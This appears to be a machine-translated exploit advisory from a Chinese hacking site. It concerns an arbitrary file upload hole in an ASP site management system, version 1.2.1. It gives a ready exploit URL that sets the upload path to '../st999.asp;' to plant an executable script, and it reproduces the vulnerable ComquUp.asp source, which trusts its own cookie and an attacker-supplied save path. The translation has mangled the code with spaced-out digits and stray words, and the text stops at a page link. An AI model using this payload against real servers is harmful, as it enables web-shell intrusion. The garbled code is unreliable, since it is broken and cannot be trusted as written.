Network fun site management system-upload vulnerability-vulnerability warning-the black bar safety net

2011-04-23T00:00:00
ID MYHACK58:62201130169
Type myhack58
Reporter 佚名
Modified 2011-04-23T00:00:00

Description

Program: web fun Site Management System 1. 2. 1 (contains the dynamic version and static version are the presence of this vulnerability)

Download: http://www.codepub.com/d/downpage.php?n=1&id=1 8 7 1 6::1 2 8 8 1 7 3 0 2 1

FROM:http://www. st999. cn/blog

DATA:2010/04/22

Use method:/ku_edit/ComquUp. asp? nf=&ni=a&nr=ok&nt=../st999. asp;&nm=&nq=&lx=1

Vulnerability file: Free_ComQu\Ku_edit\ComquUp. asp

Source:

<%Response. Buffer=True Server. ScriptTimeOut=9 9 9 9 9 9 9 On Error Resume Next%><! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" /> <meta http-equiv="Content-Language" content="zh-cn" /> <meta content="all" name="robots" /> <meta name="author" content="scoot network" /> <meta name="description" content="scoot network provides web hosting, domain name registration and other services!" /> <meta name="keywords" content="scoot network, web hosting, domain registration" /> <style type="text/css">body,form{margin:0px;padding:0px;}body,input{font-size:12px;}</style> <title>scoot file upload system V2</title> </head> <body id="body"><table width="1 0 0%" height="1 0 0%" border="0" cellspacing="0" cellpadding="0"><tr><td> <% response. Cookies("ComquUp")="1" 'You can put the above judgment of the cookies of the write statement are copied to Your sign in place, this is the“only logged in to operation to upload files.” if request. Cookies("ComquUp")="1" then%>

<% ComquDFormName=trim(request("nf")) ComquDInputName=trim(request("ni")) ComquDYNReName=trim(request("nr")) ComquDPath=trim(request("nt")) ComquDDM=trim(request("nm")) ComquDPathQ=trim(request("nq")) ComquDType=trim(request("lx"))

if ComquDPath<>"" then:ComquSavePath=ComquDPath:else:ComquSavePath="/Upfile/edit/":end if if ComquDPathQ<>"" then:ComquSavePathQ=ComquDPathQ:else:ComquSavePathQ=ComquSavePath:end if ComquYNPath(ComquSavePath)

if ComquDType="1" then ComquFileNames="jpg,gif,png,bmp" ComquBigSize=1 0 2 4 0 0 0'unit B elseif ComquDType="2" then ComquFileNames="swf,flv" ComquBigSize=1 0 2 4 0 0 0 0 elseif ComquDType="3" then ComquFileNames="avi,wmv,asf,mov,mp3,wma" ComquBigSize=1 0 2 4 0 0 0 0 0 elseif ComquDType="4" then ComquFileNames="rm,ra,ram,rmvb" ComquBigSize=1 0 2 4 0 0 0 0 0 elseif ComquDType="5" then ComquFileNames="txt,rar,zip,doc,7z,ppt" ComquBigSize=1 0 2 4 0 0 0 0 0 end if

ComquFileSize=Request. TotalBytes

If ComquFileSize>0 Then if ComquFileSize<ComquBigSize then Set ComquUpStm=Server. CreateObject("ADODB. Stream") ComquUpStm. Type=1 ComquUpStm. Open ComquUpStm. The Write Request. BinaryRead(ComquFileSize) ComquUpStm. Position=0 ComquFormDataSize=ComquUpStm. Read ComquCrlf=chrB(1 3)&chrB(1 0) ComquFormStart=InStrB(ComquFormDataSize,ComquCrlf) ComquFormEnd=InStrB(ComquFormStart+1,ComquFormDataSize,ComquCrlf) Set ComquFormStm=Server. Createobject("ADODB. Stream") ComquFormStm. Type=1 ComquFormStm. Open ComquUpStm. Position=ComquFormStart + 1 ComquUpStm. CopyTo ComquFormStm,ComquFormEnd-ComquFormStart-3 ComquFormStm. Position=0 ComquFormStm. Type=2 ComquFormStm. CharSet="GB2312" ComquFormStmText=ComquFormStm. Readtext ComquFormStm. Close ComquUpFileNAll=Mid(ComquFormStmText,InstrRev(ComquFormStmText,"\")+1,ComquFormEnd) ComquUpFileCZM=mid(ComquUpFileNAll,InstrRev(ComquUpFileNAll,"."))

If ComquCheckFileCZM(ComquUpFileNAll) Then

if ComquDDM<>"" then ComquUpFileName=ComquDDM else if ComquDYNReName<>"ok" then:ComquUpFileName=ComquUpFileNAll:else:ComquUpFileName=Year(now)&right("0"&Month(now),2)&right("0"&Day(now),2)&right("0"&Hour(now),2)&right("0"&Minute(now),2)&right("0"&amp; Second(now),2)& right(replace(Request. ServerVariables("REMOTE_ADDR"),".",""), 4)&ComquUpFileCZM:end if end if

ComquSaveFile=Server. MapPath(ComquSavePath & ComquUpFileName) k=Instrb(ComquFormDataSize,ComquCrlf&ComquCrlf)+4 l=Instrb(k+1,ComquFormDataSize,leftB(ComquFormDataSize,ComquFormStart-1))-k-2 ComquFormStm. Type=1 ComquFormStm. Open ComquUpStm. Position=k-1 ComquUpStm. CopyTo ComquFormStm,l ComquFormStm. SaveToFile ComquSaveFile,2

[1] [2] next